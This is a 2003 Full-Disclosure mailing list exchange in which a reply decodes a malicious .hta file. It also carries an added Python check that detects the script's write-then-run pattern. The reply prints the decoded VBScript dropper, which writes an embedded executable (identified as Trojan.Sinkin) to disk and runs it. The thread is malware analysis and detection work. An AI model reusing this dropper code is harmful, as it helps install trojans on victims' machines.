.hta files are a proprietary concept, and only work in conjunction with Internet Explorer (specifically version 5 and above). Basically it's much like a .html except it has no security restrictions
 
there are 2 things being encoded in the script you sent

an executable in a string called m
and a piece of vbscript code in a string called c

they seem to be encoded to trick virus scanners into letting them pass

decoding the vbscript code we get

<script language="VBScript">
Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
</SCRIPT>

which basically says: get the embedded .exe file, store it in c:\a.exe, then execute it.
the exe being dropped is identified by Norton as being Trojan.Sinkin
 
<quote>
  Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and search pages, and sends
  AOL Instant Messenger information to a remote host.
  This Trojan may also display advertisements when the user is browsing the Web
</quote>
 
now you know

----- Original Message -----
From: Jim Duggan
To: [EMAIL PROTECTED]
Sent: Thursday, November 20, 2003 2:31 AM
Subject: [Full-Disclosure] .hta virus analysys



A friend contracted this .hta that seems to edit your profile with a link to itself, http://www.talkstocks.net/
Attached is the hta file it attempts to run.  It looks to be encoded, which is something I don't know much about but I'm sure most people on this list will have no problem reading it, just wondering what it does.

Any help appreciated
Thx

Jason
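
Added example, not part of either message above: a small static triage check for the write-then-run pattern the reply describes, applied to script text that has already been decoded. The function and rule names are this example's own, and the sample is the decoded script as quoted in the reply.

```python
import re

# Decoded script as quoted in the reply above (the string m is not included).
SAMPLE = r'''<script language="VBScript">
Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
</SCRIPT>'''

SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
ARG = r'\s*\(?\s*("[^"]*"|[^,)\s]+)'          # first argument: literal or variable
WRITE = re.compile(r"\.\s*(?:CreateTextFile|OpenTextFile)" + ARG, re.I)
RUN = re.compile(r"\.\s*run\b" + ARG, re.I)
PROGIDS = ("scripting.filesystemobject", "wscript.shell")
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat")

def resolve(token, variables):
    """Turn a call argument into a path: a quoted literal or an assigned variable."""
    if token.startswith('"'):
        return token.strip('"')
    return variables.get(token.lower())

def triage(decoded):
    """List paths that a single script block both writes to disk and then runs."""
    findings = []
    for body in SCRIPT.findall(decoded) or [decoded]:
        if not all(p in body.lower() for p in PROGIDS):
            continue                      # needs both the file and the shell object
        variables = {n.lower(): v for n, v in ASSIGN.findall(body)}
        written = {resolve(t, variables) for t in WRITE.findall(body)}
        launched = {resolve(t, variables) for t in RUN.findall(body)}
        for path in sorted(p for p in written & launched if p):
            findings.append({"path": path,
                             "executable": path.lower().endswith(EXEC_EXT)})
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The check only follows simple string assignments, so a path built by concatenation or a script that is still encoded will not be reported.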
